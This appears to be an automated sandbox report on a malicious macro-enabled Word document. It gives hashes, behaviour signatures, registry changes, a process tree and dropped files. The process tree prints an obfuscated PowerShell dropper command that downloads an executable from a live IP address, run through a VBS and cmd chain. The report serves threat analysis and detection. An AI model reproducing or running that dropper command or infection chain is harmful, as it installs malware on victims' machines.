General
Target

cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm

Filesize

89KB

Completed

21-05-2022 12:29

Task

behavioral1

Score
10/10
MD5

b52f6306e6c5af7bd87fab6f32a937b9

SHA1

e7043e9907b332b9039eeb4487959d10e05d2dc0

SHA256

cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4

SHA256

0f5212be7b3294cb4b86e4f884f9b750a056c34ab9d9df040481d2244659ee2c79c084747ed5cf056ae9d4d3d35563b1901dacfbec464a20ea466029916cc9cb

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
exe.dropper

http://62.108.35.164/api.php

Signatures 14

Filter: none

Defense Evasion
Discovery
  • Process spawned unexpected child process
    explorer.exe

    Description

    This typically indicates the parent process was compromised via an exploit or macro.

    Reported IOCs

    descriptionpidpid_targetprocesstarget process
    Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process17441624explorer.exeWINWORD.EXE
  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flowpidprocess
    31928powershell.exe
  • Drops file in System32 directory
    powershell.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnkpowershell.exe
  • Drops file in Windows directory
    WINWORD.EXE

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\Debug\WIA\wiatrace.logWINWORD.EXE
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe
    timeout.exe

    Tags

    Reported IOCs

    pidprocess
    1968timeout.exe
  • Modifies Internet Explorer settings
    WINWORD.EXE

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (int)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft ExcelWINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExtWINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNoteWINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"WINWORD.EXE
    Set value (int)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\ToolbarWINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"WINWORD.EXE
  • Modifies registry class
    WINWORD.EXE

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\InterfaceWINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}WINWORD.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{7720E078-D4F5-4A06-B8DB-019B779A7D5F}\2.0WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432NodeWINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\TypeLib\{7720E078-D4F5-4A06-B8DB-019B779A7D5F}\2.0\0WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"WINWORD.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{7720E078-D4F5-4A06-B8DB-019B779A7D5F}\2.0\FLAGSWINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"WINWORD.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{7720E078-D4F5-4A06-B8DB-019B779A7D5F}\2.0\0WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"WINWORD.EXE
  • Suspicious behavior: AddClipboardFormatListener
    WINWORD.EXE

    Reported IOCs

    pidprocess
    1624WINWORD.EXE
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe

    Reported IOCs

    pidprocess
    1928powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege1928powershell.exe
  • Suspicious use of SetWindowsHookEx
    WINWORD.EXE

    Reported IOCs

    pidprocess
    1624WINWORD.EXE
    1624WINWORD.EXE
  • Suspicious use of WriteProcessMemory
    WINWORD.EXEexplorer.exeWScript.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1624 wrote to memory of 17441624WINWORD.EXEexplorer.exe
    PID 1624 wrote to memory of 17441624WINWORD.EXEexplorer.exe
    PID 1624 wrote to memory of 17441624WINWORD.EXEexplorer.exe
    PID 1624 wrote to memory of 17441624WINWORD.EXEexplorer.exe
    PID 268 wrote to memory of 1324268explorer.exeWScript.exe
    PID 268 wrote to memory of 1324268explorer.exeWScript.exe
    PID 268 wrote to memory of 1324268explorer.exeWScript.exe
    PID 1324 wrote to memory of 14881324WScript.execmd.exe
    PID 1324 wrote to memory of 14881324WScript.execmd.exe
    PID 1324 wrote to memory of 14881324WScript.execmd.exe
    PID 1488 wrote to memory of 19281488cmd.exepowershell.exe
    PID 1488 wrote to memory of 19281488cmd.exepowershell.exe
    PID 1488 wrote to memory of 19281488cmd.exepowershell.exe
    PID 1488 wrote to memory of 19681488cmd.exetimeout.exe
    PID 1488 wrote to memory of 19681488cmd.exetimeout.exe
    PID 1488 wrote to memory of 19681488cmd.exetimeout.exe
Processes 7
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm"
    Drops file in Windows directory
    Modifies Internet Explorer settings
    Modifies registry class
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:1624
    • C:\Windows\SysWOW64\explorer.exe
      explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
      Process spawned unexpected child process
      PID:1744
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Suspicious use of WriteProcessMemory
    PID:268
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"
      Suspicious use of WriteProcessMemory
      PID:1324
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "
        Suspicious use of WriteProcessMemory
        PID:1488
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://62.108.35.164/api.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')
          Blocklisted process makes network request
          Drops file in System32 directory
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:1928
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 10
          Delays execution with timeout.exe
          PID:1968
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Persistence
                    Privilege Escalation
                      Replay Monitor
                      00:00 00:00
                      Downloads
                      • C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd

                        MD5

                        197fd11428deaf8779c40b8aee37c023

                        SHA1

                        66d053c6349a994301ba6ec562c7e659f6e60e40

                        SHA256

                        7ede0b864739e9a03678ef876fb0b218b87a7d15f89b2a280989024b739deaf8

                        SHA512

                        ab9b7ad1502532ed065bfa4bcc9e559d3a92bc9be3b46d24b1ba5a32ff7f58f7afa7431314435f434e025f36a8b4272d2a5a3ee4fbfdbeae560f809f978fcfc4

                      • C:\ProgramData\OIUTFuy

                        MD5

                        12a0751c89b3b618b7c91cee7a231878

                        SHA1

                        2d546c942a6626826dc1d76d752cb6bb67546a94

                        SHA256

                        c9a5966dac467eaafd2848273ad734127ba965224225a7e56a02113a1af571bc

                        SHA512

                        aab37a468a8ade701a7c21042df0bca8f58c37223dbf2709285cac863a16b98085f66bd9add1c2480cbdf86781671f1589e4f37b472398de02b1d9dde8ee5fd3

                      • C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs

                        MD5

                        d940788959fad6d9ec52674997f04457

                        SHA1

                        c784384517d2c206c5423a8d58dee5d9ca9c6ffb

                        SHA256

                        46b2da0c04f3b7edb5ab3c1280904dbc645fca003e80a3390e483bde1b80a646

                        SHA512

                        802359aade02f39171298dd57dec02943af22aef5105c9e8e91959b71072258b3e2eff75eda0996c04ab7704ba829ec776f1a6f9673b95cf35a860a7859d5430

                      • memory/268-68-0x000007FEFB6B1000-0x000007FEFB6B3000-memory.dmp

                      • memory/1324-70-0x0000000000000000-mapping.dmp

                      • memory/1488-73-0x0000000000000000-mapping.dmp

                      • memory/1624-71-0x000000005FFF0000-0x0000000060000000-memory.dmp

                      • memory/1624-60-0x00000000008D3000-0x00000000008D7000-memory.dmp

                      • memory/1624-63-0x00000000008D3000-0x00000000008D7000-memory.dmp

                      • memory/1624-55-0x000000006FCD1000-0x000000006FCD3000-memory.dmp

                      • memory/1624-58-0x0000000070CBD000-0x0000000070CC8000-memory.dmp

                      • memory/1624-59-0x00000000008D3000-0x00000000008D7000-memory.dmp

                      • memory/1624-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

                      • memory/1624-61-0x00000000008D3000-0x00000000008D7000-memory.dmp

                      • memory/1624-57-0x0000000075C71000-0x0000000075C73000-memory.dmp

                      • memory/1624-54-0x0000000072251000-0x0000000072254000-memory.dmp

                      • memory/1744-67-0x000000006A9B1000-0x000000006A9B3000-memory.dmp

                      • memory/1744-65-0x0000000000000000-mapping.dmp

                      • memory/1928-77-0x000007FEF3330000-0x000007FEF3D53000-memory.dmp

                      • memory/1928-79-0x0000000002464000-0x0000000002467000-memory.dmp

                      • memory/1928-78-0x000007FEF27D0000-0x000007FEF332D000-memory.dmp

                      • memory/1928-80-0x000000000246B000-0x000000000248A000-memory.dmp

                      • memory/1928-75-0x0000000000000000-mapping.dmp

                      • memory/1968-81-0x0000000000000000-mapping.dmp